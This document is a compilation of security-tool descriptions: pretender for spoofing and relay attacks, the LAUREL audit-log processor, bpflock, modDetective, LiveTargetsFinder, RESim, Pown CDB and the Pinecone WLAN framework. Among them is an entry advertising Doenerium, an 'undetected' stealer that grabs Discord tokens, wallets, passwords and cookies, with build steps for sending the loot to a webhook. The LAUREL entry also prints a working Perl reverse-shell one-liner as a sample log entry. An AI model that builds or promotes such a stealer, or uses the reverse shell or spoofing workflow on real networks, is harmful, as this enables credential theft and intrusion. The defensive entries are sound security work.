pretender is a tool developed by RedTeam Pentesting to obtain machine-in-the-middle positions via spoofed local name resolution and DHCPv6 DNS takeover attacks. pretender primarily targets Windows hosts, as it is intended to be used for relaying attacks, but it can be deployed on Linux, Windows and all other platforms Go supports. Name resolution queries can be answered with arbitrary IPs for situations where the relaying tool runs on a different host than pretender. It is designed to work with tools such as Impacket's ntlmrelayx.py and krbrelayx that handle the incoming connections for relaying attacks or hash dumping.

Read our blog post for more information about DHCPv6 DNS takeover, local name resolution spoofing and relay attacks.


Usage

To get a feel for the situation in the local network, pretender can be started in --dry mode where it only logs incoming queries and does not answer any of them:

pretender -i eth0 --dry
pretender -i eth0 --dry --no-ra # without router advertisements

To perform local name resolution spoofing via mDNS, LLMNR and NetBIOS-NS as well as a DHCPv6 DNS takeover with router advertisements, simply run pretender like this:

pretender -i eth0

You can disable certain attacks with --no-dhcp-dns (disables DHCPv6, DNS and router advertisements), --no-lnr (disables mDNS, LLMNR and NetBIOS-NS), --no-mdns, --no-llmnr, --no-netbios and --no-ra.

If ntlmrelayx.py runs on a different host (say 10.0.0.10/fe80::5), run pretender like this:

pretender -i eth0 -4 10.0.0.10 -6 fe80::5

Pretender can be set up to only respond to queries for certain domains (or all but certain domains), and it can perform the spoofing attacks only for certain hosts (or all but certain hosts). Referencing hosts by hostname relies on the name resolution of the host that runs pretender. See the following example:

pretender -i eth0 --spoof example.com --dont-spoof-for 10.0.0.3,host1.corp,fe80::f --ignore-nofqdn

For more information, run pretender --help.


Tips

  • Make sure to enable IPv6 support in ntlmrelayx.py with the -6 flag
  • Pretender can be configured to stop after a certain time period for situations where it cannot be aborted manually (--stop-after and main.vendorStopAfter)
  • Host info lookup (which relies on the ARP table, IP neighbours and reverse lookups) can be disabled with --no-host-info or main.vendorNoHostInfo
  • If you are not sure which interface to choose (especially on Windows), list all interfaces with names and addresses using --interfaces
  • If you want to exclude hosts from local name resolution spoofing, make sure to also exclude their IPv6 addresses or use --no-ipv6-lnr/main.vendorNoIPv6LNR
  • DHCPv6 messages usually contain a FQDN option (which can also sometimes contain a hostname which is not a FQDN). This option is used to filter out messages by hostname (--spoof-for/--dont-spoof-for). You can decide what to do with DHCPv6 messages without FQDN option by setting or omitting --ignore-nofqdn
  • Depending on the build configuration, either the operating system resolver (CGO_ENABLED=1) or a Go implementation (CGO_ENABLED=0) is used. This can be important for host info collection because the OS resolver may support local name resolution and the Go implementation does not, unless a stub resolver is used.
  • The host info functionality is currently only available for Windows and Linux.
  • A custom MAC address vendor list can be compiled into the binary by replacing the default list hostinfo/mac-vendors.txt. Only lines with MAC prefixes in the following format are recognized: FF:FF:FF<tab>VendorID<tab>Vendor (the MAC prefix length can be arbitrary); see the example after this list.
  • If you only want to perform Kerberos relaying you can specify --no-lnr and --spoof-types SOA to ignore any queries that are unrelated to the attack.
  • When conducting a Kerberos relay attack where krbrelayx.py runs on a different host than pretender (the relay IPv4 address points to a different host that runs krbrelayx.py), the host running krbrelayx.py will also need to run pretender in order to receive and deny the Dynamic Update query sent to the relay IPv4 address.
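
For illustration, a custom entry in hostinfo/mac-vendors.txt might look like the line below (fields separated by literal tabs; 00:50:56 is a well-known VMware OUI, while the VendorID value here is made up):

00:50:56<tab>VMW<tab>VMware, Inc.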

Building and Vendoring

Pretender can be built as follows:

go build

Pretender can also be compiled with pre-configured settings. For this, the ldflags have to be modified like this:

-ldflags '-X main.vendorInterface=eth1'

For example, Pretender can be built for Windows with a specific default interface, without colored output and with a relay IPv4 address configured:

GOOS=windows go build -trimpath -ldflags '-X "main.vendorInterface=Ethernet 2" -X main.vendorNoColor=true -X main.vendorRelayIPv4=10.0.0.10'

Full list of vendoring options (see defaults.go or pretender --help for detailed information):

vendorInterface
vendorRelayIPv4
vendorRelayIPv6
vendorSOAHostname
vendorNoDHCPv6DNSTakeover
vendorNoDHCPv6
vendorNoDNS
vendorNoMDNS
vendorNoNetBIOS
vendorNoLLMNR
vendorNoLocalNameResolution
vendorNoRA
vendorNoIPv6LNR
vendorSpoof
vendorDontSpoof
vendorSpoofFor
vendorDontSpoofFor
vendorSpoofTypes
vendorIgnoreDHCPv6NoFQDN
vendorDryMode
vendorTTL
vendorLeaseLifetime
vendorRARouterLifetime
vendorRAPeriod
vendorStopAfter
vendorVerbose
vendorNoColor
vendorNoTimestamps
vendorLogFileName
vendorNoHostInfo
vendorHideIgnored
vendorRedirectStderr
vendorListInterfaces


Laurel - Transform Linux Audit Logs For SIEM Usage


LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.


Why?

TLDR: Instead of audit events that look like this…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

This happens at the source. The generated event even contains useful information about the spawning process:

"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Description

Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH and EXECVE elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.
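For example, the beginning of the hex-encoded a2 argument from the EXECVE record shown earlier can be recovered with standard tools (a quick sketch using xxd; the hex below is only the visible prefix of the truncated string):

echo 75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B | xxd -r -p
use Socket;$i="10.0.0.1";$p=1234;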

LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).

Refer to JSON-based log format for a description of the log format.

We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.

A word about audit rules

A good starting point for an audit ruleset is https://github.com/Neo23x0/auditd, but generally speaking, any ruleset will do. LAUREL currently only works as designed if End Of Event (EOE) records are not suppressed, so rules like

-a always,exclude -F msgtype=EOE

should be removed.
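To check whether such a suppression rule is currently loaded, you can list the active audit rules as root:

auditctl -l | grep -i eoe

If this prints a matching exclude rule, remove it from your ruleset.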

Events with context

Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available, id points to the message corresponding to the last execve syscall for this process:

"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/dash",
"ppid": 1532
}

Adding more context: Keys and process labels

Audit events can contain a key, a short string that can be used to filter events. LAUREL can be configured to recognize such keys and add them as labels to the process that caused the event. These labels can also be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis when filtering out harmless events.

Consider the following rule that sets keys for apt and dpkg invocations:

-w /usr/bin/apt-get -p x -k software_mgmt

Let's configure LAUREL to turn the software_mgmt key into a process label that is propagated to child processes:
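A sketch of the relevant config.toml stanza (the key names follow LAUREL's documented label-process options; verify them against your installed version):

[label-process]
label-keys = [ "software_mgmt" ]
propagate-labels = [ "software_mgmt" ]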

Together with a ruleset that logs execve(2) and variants, this will cause every event directly caused by apt-get and its subprocesses to be labelled software_mgmt.

For example, when running sudo apt-get update on a Debian/bullseye system with a few sources configured, the following subprocesses labelled software_mgmt can be observed in LAUREL's audit log:

  • apt-get update
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/lib/apt/methods/gpgv
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/bin/dpkg --print-foreign-architectures

This sort of tracking also works for package installation or removal. If some package's post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting that single event.

Installation

See INSTALL.md.

License

GNU General Public License, version 3

Authors

The logo was created by Birgit Meyer <hello@biggi.io>.



Bpflock - eBPF Driven Security For Locking And Auditing Linux Machines


bpflock - eBPF driven security for locking and auditing Linux machines.

Note: bpflock is currently in an experimental stage; it may break, options and security semantics may change, and some BPF programs will be updated to use the Cilium eBPF library.


1. Introduction

bpflock uses eBPF to strengthen Linux security. By restricting access to a wide range of Linux features, bpflock is able to reduce the attack surface and block some well-known attack techniques.

Only programs like container managers, systemd, and other containers/programs that run in the host pid and network namespaces are allowed access to full Linux features; containers and applications that run in their own namespaces will be restricted. If bpflock's bpf programs run under the restricted profile, then all programs/containers, including privileged ones, will have their access denied.

bpflock protects Linux machines by taking advantage of multiple security features including Linux Security Modules + BPF.

Architecture and Security design notes:

  • bpflock is not a mandatory access control labeling solution, and it does not intend to replace AppArmor, SELinux, or other MAC solutions. bpflock uses a simple declarative security profile.
  • bpflock offers multiple small bpf programs that can be reused in multiple contexts from Cloud Native deployments to Linux IoT devices.
  • bpflock is able to restrict root from accessing certain Linux features; however, it does not protect against an evil root.

2. Functionality Overview

2.1 Security features

bpflock offers multiple security protections that can be classified into several categories.

2.2 Semantics

bpflock keeps the security semantics simple. It supports three global profiles to broadly cover the security spectrum, and restricts access to specific Linux features.

  • profile: this is the global profile that can be applied per bpf program; it takes one of the following:

    • allow|none|privileged : these are equivalent and define the least secure profile. In this profile, access is logged and allowed for all processes. Useful for logging security events.
    • baseline : a restrictive profile where access is denied for all processes, except privileged applications and containers that run in the host namespaces, or per-cgroup allowed profiles in the bpflock_cgroupmap bpf map.
    • restricted : a heavily restricted profile where access is denied for all processes.
  • Allowed or blocked operations/commands:

    Under the allow|privileged or baseline profiles, a list of allowed or blocked commands can be specified and will be applied.

    • --protection-allow : comma-separated list of allowed operations. Valid under the baseline profile, this is useful for applications that are very specific and perform privileged operations. It reduces the need for the allow|privileged profile: instead of using the privileged profile, we can use baseline and add a set of allowed commands, offering a case-by-case definition for such applications.
    • --protection-block : comma-separated list of blocked operations. Valid under the allow|privileged and baseline profiles, it allows restricting access to some features without using the full restricted profile, which might break some specific applications. Using the baseline or privileged profiles opens the gate to most Linux features, but with the --protection-block option some of this access can be blocked.

For bpf security examples, check the bpflock configuration examples.

3. Deployment

3.1 Prerequisites

bpflock needs the following:

  • Linux kernel version >= 5.13 with the following configuration:

    Obviously a BTF enabled kernel.

    Enable BPF LSM support

    Check /boot/config-* to confirm that your kernel was compiled with CONFIG_BPF_LSM=y. If BPF LSM support is missing, running bpflock fails with:

    must have a kernel with 'CONFIG_BPF_LSM=y' 'CONFIG_LSM=\"...,bpf\"'"
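    For example, both options can be checked against the running kernel with:

    grep -E 'CONFIG_BPF_LSM|CONFIG_LSM=' /boot/config-$(uname -r)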

    Then to enable BPF LSM as an example on Ubuntu:

    1. Open the /etc/default/grub file with root privileges.
    2. Append the following to the GRUB_CMDLINE_LINUX variable and save.
      "lsm=lockdown,capability,yama,apparmor,bpf"
      or
      GRUB_CMDLINE_LINUX="lsm=lockdown,capability,yama,apparmor,bpf"
    3. Update grub config with:
      sudo update-grub2
    4. Reboot into your kernel.

    3.2 Docker deployment

    To run using the default allow or privileged profile (the least secure profile):

    docker run --name bpflock -it --rm --cgroupns=host \
    --pid=host --privileged \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Fileless Binary Execution

    To log and restrict fileless binary execution, run with:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_FILELESSLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    When running under the restricted profile, the container logs will display the restriction in action.

    Running under the restricted profile may break things; this is why the default profile is allow.

    Kernel Modules Protection

    To apply Kernel Modules Protection run with environment variable BPFLOCK_KMODLOCK_PROFILE=baseline or BPFLOCK_KMODLOCK_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KMODLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example:

    $ sudo unshare -p -n -f
    # modprobe xfs
    modprobe: ERROR: could not insert 'xfs': Operation not permitted

    Kernel Image Lock-down


    To apply Kernel Image Lock-down run with environment variable BPFLOCK_KIMGLOCK_PROFILE=baseline:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KIMGLOCK_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example:

    $ sudo unshare -f -p -n bash
    # head -c 1 /dev/mem
    head: cannot open '/dev/mem' for reading: Operation not permitted

    BPF Protection


    To apply bpf restriction run with environment variable BPFLOCK_BPFRESTRICT_PROFILE=baseline or BPFLOCK_BPFRESTRICT_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_BPFRESTRICT_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example running in a different pid and network namespaces and using bpftool:

    $ sudo unshare -f -p -n bash
    # bpftool prog
    Error: can't get next program: Operation not permitted
    Running with the -e "BPFLOCK_BPFRESTRICT_PROFILE=restricted" profile will deny bpf for all processes.

    3.3 Configuration and Environment file

    Passing configuration as bind mounts can be achieved using the following command.

    Assuming the bpflock.yaml and bpf.d profile configs are in a bpflock directory inside the current directory, we can simply use:

    ls bpflock/
    bpf.d bpflock.d bpflock.yaml

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -v $(pwd)/bpflock/:/etc/bpflock \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Passing environment variables can also be done with files using --env-file. All parameters can be passed as environment variables using the BPFLOCK_$VARIABLE_NAME=VALUE format.

    Example run with environment variables in a file:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    --env-file bpflock.env.list \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock
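    For illustration, a hypothetical bpflock.env.list could contain one variable per line, using env vars shown earlier in this section, e.g.:

    BPFLOCK_KMODLOCK_PROFILE=baseline
    BPFLOCK_BPFRESTRICT_PROFILE=baseline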

    4. Documentation

    Documentation files can be found here.

    5. Build

    bpflock uses Docker BuildKit to build, and Go for some checks and tests. bpflock is built inside an Ubuntu container that downloads the standard Go package.

    Run the following to build the bpflock docker container:

    git submodule update --init --recursive
    make

    BPF programs are built using libbpf. The Docker image used is Ubuntu.

    If you want to only build the bpf programs directly without using docker, then on Ubuntu:

    sudo apt install -y pkg-config bison binutils-dev build-essential \
    flex libc6-dev clang-12 libllvm12 llvm-12-dev libclang-12-dev \
    zlib1g-dev libelf-dev libfl-dev gcc-multilib \
    libcap-dev libiberty-dev libbfd-dev

    Then run:

    make bpf-programs

    In this case the generated programs will be inside the ./bpf/build/... directory.

    Credits

    bpflock uses a lot of resources, including source code from the Cilium and bcc projects.

    License

    The bpflock user space components are licensed under the Apache License, Version 2.0. Where noted, the BPF code is licensed under the GNU General Public License, Version 2.0.



Doenerium - Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)


Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)

Features

Stealer

  • Discord Token
  • Discord Info - Username, Phone number, Email, Billing, Nitro Status & Backup Codes
  • Discord Friends with rare badges
  • Grabs crypto wallets
    • Zcash
    • Armory
    • Bytecoin
    • Jaxx
    • Exodus
    • Ethereum
    • Electrum
    • AtomicWallet
    • Guarda
    • Coinomi
  • Browser (Chrome, Opera, Firefox, OperaGX, Edge, Brave, Yandex) - Passwords, Cookies, Autofill & History (Searches for specific keywords such as PayPal, Coinbase etc. in them)
  • Screenshot(s)
  • Injects itself into Discord to grab the token when it changes


Additional

  • Crypto Clipper - BTC, LTC, XMR, ETH, XRP, NEO, BCH, DOGE, DASH, XLM
  • Ultra Obfuscation (use https://obfuscator.io)
  • Anti-Debug
  • Anti-VM
  • Validates a found discord token and then sends it to your discord webhook
  • Sends all files to your Discord webhook in beautiful embeds and a structured zip file


Screenshots

Setting Up

Install Node.js

Install Visual Studio with the C++ compilers and all components enabled (the download is a few gigabytes, but you will avoid build errors)

Run install.bat to install all necessary files

Replace WEBHOOK with your webhook in config.js

Run build.bat and wait for doenerium-win.exe to be built.

Todo

  • Exodus wallet injection (grab the password whenever the user logs in to the wallet)
  • More grabbers (VPNs, gaming, messengers)
  • Keylogger
  • Growtopia stealer
  • Discord bot to build within discord ($build <webhook_url>)
  • Dynamic encryption

License

By downloading this, you agree to the Commons Clause license and that you're not allowed to sell this repository or any code from this repository. For more info see commonsclause

Note

There is no official Telegram group for this project. I don't own t.me/doenerium

I am not responsible for any damages this software may cause. This was made for personal education.

Credits

Credits to Pandoric / PandoricGalaxy for creating this beautiful README file



modDetective - Tool That Chronologizes Files Based On Modification Time In Order To Investigate Recent System Activity


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in CTFs to pinpoint where escalation and attack vectors may exist.



To see the tool in its most useful form, try running the command as follows: python3 modDetective.py -i /usr/share,/usr/lib,/lib. This will ignore the /usr/lib, /usr/share, and /lib directories, which tend not to have anything of interest. Also note that by default the "dynamic" directories are ignored (/proc, /sys, /run, /snap, /dev).

What is modDetective Doing?

modDetective is very elementary in how it operates. It simply walks the filesystem, with bounds determined by user-specified options (-i is for ignore, meaning the tool will walk every directory EXCEPT the ones specified in the -i option, and -e is for exclusive, meaning the tool will ONLY walk the directories specified). While walking, it picks up the modification time of each file, then orders these modification times to output them chronologically.
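The core idea can be approximated with a find one-liner (a rough sketch of what modDetective automates, not the tool itself), pruning the "dynamic" directories and sorting the remaining files by modification time:

find / \( -path /proc -o -path /sys -o -path /run -o -path /snap -o -path /dev \) -prune -o -type f -printf '%T@ %TY-%Tm-%Td %TH:%TM %p\n' 2>/dev/null | sort -n | tail -n 20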

Additionally, in the output you will potentially see some files highlighted in red. These files are denoted as "Indicators of User Activity," since recent modifications to these files indicate that a user is currently active. As of now, these files include .swp files, .bash_history, .python_history and .viminfo. This list will be extended as I brainstorm more files that indicate present user activity.

Requirements

modDetective currently works only with Python 3; Python 2 compatibility will be completed shortly (hence the lack of f-strings). The standard libraries should be fine.



LiveTargetsFinder - Generates Lists Of Live Hosts And URLs For Targeting, Automating The Usage Of MassDNS, Masscan And Nmap To Filter Out Unreachable Hosts And Gather Service Information


Generates lists of live hosts and URLs for targeting, automating the usage of MassDNS, Masscan and nmap to filter out unreachable hosts

Given an input file of domain names, this script will automate the usage of MassDNS to filter out unresolvable hosts, and then pass the results on to Masscan to confirm that the hosts are reachable and on which ports. The script will then generate a list of full URLs to be used for further targeting (passing into tools like gobuster or dirsearch, or making HTTP requests), a list of reachable domain names, and a list of reachable IP addresses. As an optional last step, you can run an nmap version scan on this reduced host list, verifying that the earlier reachable hosts are up, and gathering service information from their open ports.


Overview

This script is especially useful for large domain sets, such as subdomain enumerations gathered from an apex domain with thousands of subdomains. With these large lists, an nmap scan would simply take too long. The goal here is to first use the less accurate, but much faster, MassDNS to quickly reduce the size of your input list by removing unresolvable domains. Then, Masscan will be able to take the output from MassDNS, and further confirm that the hosts are reachable, and on which ports. The script will then parse these results and generate lists of the live hosts discovered.

Now, the list of hosts should be reduced enough to be suitable for further scanning/testing. If you want to go a step further, you can tell the script to run an nmap scan on the list of reachable hosts, which should take a more reasonable amount of time with the shorter list of hosts. After running nmap, any false positives given by Masscan will be filtered out. Raw nmap output will be stored in the regular nmap XML format, and additional information from the version detection will be added to a SQLite database.
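Since the database schema may evolve, one way to explore the results is to inspect the SQLite file directly with the sqlite3 CLI before writing queries against it:

sqlite3 output/liveTargetsFinder.sqlite3 '.tables'
sqlite3 output/liveTargetsFinder.sqlite3 '.schema'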

Installation

If using the nmap scan option, this tool assumes that you already have nmap installed

Note: Running the install script is only needed if you do not already have MassDNS and Masscan installed, or if you would like to reinstall them inside this repo. If you do not run the script, you can provide the paths to the respective executables as arguments. The script additionally expects that the resolvers list included with MassDNS be located at {massDNS_directory}/lists/resolvers.txt.

git clone https://github.com/allyomalley/LiveTargetsFinder.git
cd LiveTargetsFinder
sudo pip3 install -r requirements.txt

(OPTIONAL)

chmod +x install_deps.sh
./install_deps.sh

If you do not already have MassDNS and Masscan installed, and would prefer to install them yourself, see the documentation for instructions:

MassDNS

Masscan

I have only tested this script on macOS and Linux - the python script itself should work on a Windows machine, though I believe the installation for MassDNS and Masscan will differ.

Usage

python3 liveTargetsFinder.py [domainList] [options]
  • --target-list : Input file containing a list of domains, e.g. google.com (required)
  • --massdns-path : Path to the MassDNS executable, if non-default (default: ./massdns/bin/massdns)
  • --masscan-path : Path to the Masscan executable, if non-default (default: ./masscan/bin/masscan)
  • --nmap : Run an nmap version detection scan on the gathered live hosts (default: disabled)
  • --db-path : If using the --nmap option, the path to the database to append to; it will be created if it does not exist (default: output/liveTargetsFinder.sqlite3)
  • Note that the Masscan and MassDNS settings are hardcoded inside liveTargetsFinder.py. Feel free to edit them (lines 87 + 97).
  • Since this tool was designed with very large lists in mind, I tweaked many of the settings to try to balance speed, accuracy, and network constraints - these can all be adjusted to suit your needs and bandwidth.
  • The default Masscan settings only scan ports 80 and 443.
    • -s, (--hashmap-size) in particular was chosen for performance reasons - you will likely be able to increase this.
    • Full MassDNS arguments:
      • -c 25 -o J -r ./massdns/lists/resolvers.txt -s 100 -w massdnsOutput -t A targetHosts
      • Documentation
  • Another setting of note is the --max-rate argument for Masscan - you will likely want to adjust this.
    • Full Masscan arguments:
      • -iL ipFile -oD masscanOutput --open-only --max-rate 5000 -p80,443 --max-retries 10
      • Documentation
  • The default nmap settings only scan ports 80 and 443, with -T4 timing and a few NSE scripts.
    • Full nmap arguments:
      • --script http-server-header.nse,http-devframework.nse,http-headers -sV -T4 -p80,443 -oX {output.xml}

Example

Did run install script:

python3 liveTargetsFinder.py --target-list victim_domains.txt

Did NOT run the install script:

python3 liveTargetsFinder.py --target-list victim_domains.txt --massdns-path ../massdns/bin/massdns --masscan-path ../masscan/bin/masscan 

Perform an nmap scan and write to/append to the default DB path (liveTargetsFinder.sqlite3)

python3 liveTargetsFinder.py --target-list victim_domains.txt --nmap

Perform an nmap scan and write to/append to the specified database

python3 liveTargetsFinder.py --target-list victim_domains.txt --nmap --db-path serviceinfo_victim.sqlite3

Output

Input: victimDomains.txt

  • output/victimDomains_targetUrls.txt : List of reachable, live URLs (e.g. https://github.com, http://github.com)
  • output/victimDomains_domains_alive.txt : List of live domain names (e.g. github.com, google.com)
  • output/victimDomains_ips_alive.txt : List of live IP addresses (e.g. 10.1.0.200, 52.3.1.166)
  • Supplied or default DB path : SQLite database storing live hosts and information about their running services
  • output/victimDomains_massdns.txt : Raw MassDNS output, in ndjson format
  • output/victimDomains_masscan.txt : Raw Masscan output, in ndjson format
  • output/victimDomains_nmap.txt : Raw nmap output, in XML format


RESim - Reverse Engineering Software Using A Full System Simulator


Reverse engineering using a full system simulator.

  • Dynamic analysis by instrumenting simulated hardware using Simics
  • Trace process trees, system calls and individual programs
  • Reverse execution to selected breakpoints and events
  • Integrated with IDA Pro(tm) debugging client
  • Fuzz with a customized AFL, injecting directly into simulated memory

RESim is a dynamic system analysis tool that provides detailed insight into processes, programs and data flow within networked computers. RESim simulates networks of computers through use of the Simics[1] platform's high-fidelity models of processors, peripheral devices (e.g., network interface cards), and disks. The networked simulated computers load and run targeted software copied from images extracted from the physical systems being modeled.

Broadly, RESim aids reverse engineering and vulnerability analysis of networks of Linux-based systems by inventorying processes in terms of the programs they execute and the data they consume. Data sources include files, device interfaces and inter-process communication mechanisms. Process execution and data consumption is documented through dynamic analysis of a running simulated system without installation or injection of software into the simulated system, and without detailed knowledge of the kernel hosting the processes.

RESim also provides interactive visibility into individual executing programs through use of a custom plug-in to the IDA Pro disassembler/debugger. The disassembler/debugger allows setting breakpoints to pause the simulation at selected events in either future time, or past time. For example, RESim can direct the simulation state to reverse until the most recent modification of a selected memory address.
Reloadable checkpoints may be generated at any point during system execution.
A RESim simulation can be paused for inspection, e.g., when a specified process is scheduled for execution, and subsequently continued, potentially with altered memory or register state. The analyst can explicitly modify memory or register content, and can also dynamically augment memory based on system events, e.g., change a password file entry when read by the su program.

Analysis is performed entirely through observation of the simulated target system’s memory and processor state, without need for shells, software injection, or kernel symbol tables. The analysis is said to be external because the analysis observation functions have no effect on the state of the simulated system.

RESim has been integrated with the American Fuzzy Lop (AFL) fuzzer. This fuzzing system injects fuzzed data directly into the application's read buffer, simplifying the fuzzing setup and workflow. RESim automatically replays and analyzes any detected crashes, identifying the causes of crashes, e.g., corruption of execution control.

Please refer to the RESim User's Guide for additional information. A brief demonstration of RESim can be seen here: (https://nps.box.com/s/rf3n104ualg38pon6b7fm6m6wqk9zz50)

RESim is based on a software vetting and forensic analysis platform created for the DARPA Cyber Grand Challenge. That repo is here: https://github.com/mfthomps/cgc-monitor. A paper describing that work is at https://www.sciencedirect.com/science/article/pii/S1742287618301920, and a fine summary of the use of Simics in the CGC Monitor is at https://software.intel.com/content/www/us/en/develop/blogs/simics-software-automates-cyber-grand-challenge-validation.html

[1] Simics is a full system simulator sold by Wind River, which holds all relevant trademarks.



Cdb - Automate Common Chrome Debug Protocol Tasks To Help Debug Web Applications From The Command-Line And Actively Monitor And Intercept HTTP Requests And Responses


Pown CDB is a Chrome Debug Protocol utility. The main goal of the tool is to automate common tasks to help debug web applications from the command-line and actively monitor and intercept HTTP requests and responses. This is particularly useful during penetration tests and other types of security assessments and investigations.


Credits

This tool is part of the secapps.com open-source initiative.

  ___ ___ ___   _   ___ ___  ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com

Authors

Quickstart

This tool is meant to be used as part of Pown.js but it can be invoked separately as an independent tool.

Install Pown first as usual:

$ npm install -g pown@latest

Invoke directly from Pown:

$ pown cdb

Library Use

Install this module locally from the root of your project:

$ npm install @pown/cdb --save

Once done, invoke pown cli:

$ POWN_ROOT=. ./node_modules/.bin/pown-cli cdb

You can also use the global pown to invoke the tool locally:

$ POWN_ROOT=. pown cdb

Usage

WARNING: This pown command is currently under development and as a result will be subject to breaking changes.

pown cdb <command>

Chrome Debug Protocol Tool

Commands:
pown cdb launch Launch server application such as chrome, firefox, opera and edge [aliases: start]
pown cdb navigate <url> Go to the specified url [aliases: goto, go]
pown cdb network Chrome Debug Protocol Network Monitor [aliases: net, sniff, proxy, mon, monitor]
pown cdb cookies Dump current page cookies [aliases: cookie]
pown cdb screenshot <file> Screenshot the current page [aliases: capture, shoot, shot]

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown cdb launch

pown cdb launch

Launch server application such as chrome, firefox, opera and edge

Options:
--version Show version number [boolean]
--help Show help [boolean]
--port, -p Remote debugging port [number] [default: 9222]
--xss-auditor, -x Turn on/off XSS auditor [boolean] [default: true]
--certificate-errors, -c Turn on/off certificate errors [boolean] [default: true]
--pentest, -t Start with prefered settings for pentesting [boolean] [default: false]

pown cdb navigate

pown cdb network
pown cdb cookies
pown cdb screenshot
Tutorials

Web Application Security Assessment

Let's explore how to use Pown CDB during a typical web app security engagement.

First, ensure that you have the latest pown installed:

$ npm install -g pown

If you have pown installed, make sure you have the latest version:

$ pown update

To get started with Pown CDB, we need a Chrome browser instance (other browsers are also supported) with the Chrome debug remote interface enabled and listening on localhost:

$ pown cdb launch --port 9333

Once the Chrome browser instance is running, hook it with the pown cdb network utility:

$ pown cdb network --port 9333 -b

The -b flag is used to start Pown CDB with a curses-based user interface:


Use key-combo shift + ? to get a list of available shortcuts:


As soon as you start using the browser, Pown CDB will record and display the traffic in the user interface. To intercept requests use key-combo ctrl + t.


Requests are captured and opened in your default shell editor ($EDITOR). Make the desired changes, save and quit. The original request will be replaced with your changes.
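Since intercepted requests open in whatever $EDITOR points to, it is worth setting the variable explicitly before starting the network monitor, for example:

export EDITOR=vim   # or nano, emacs, etc.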



Pinecone - A WLAN Red Team Framework


Pinecone is a WLAN network auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to run on Debian-based operating systems. Pinecone is especially oriented towards use with a Raspberry Pi, as a portable wireless auditing box.

This tool is designed for educational and research purposes only. Only use it with explicit permission.


Installation

For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, Raspberry Pi Desktop and Kali Linux). Pinecone has the following requirements:

  • Python 3.5+. Your distribution probably comes with Python 3 already installed; if not, it can be installed using apt-get install python3.
  • dnsmasq (tested with version 2.76). Can be installed using apt-get install dnsmasq.
  • hostapd-wpe (tested with version 2.6). Can be installed using apt-get install hostapd-wpe. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a Kali Linux repository pre-compiled package, or compile it from its source code.

After installing the necessary packages, you can install the Python packages requirements for Pinecone using pip3 install -r requirements.txt in the project root folder.

Usage

For starting Pinecone, execute python3 pinecone.py from within the project root folder:

root@kali:~/pinecone# python pinecone.py 
[i] Database file: ~/pinecone/db/database.sqlite
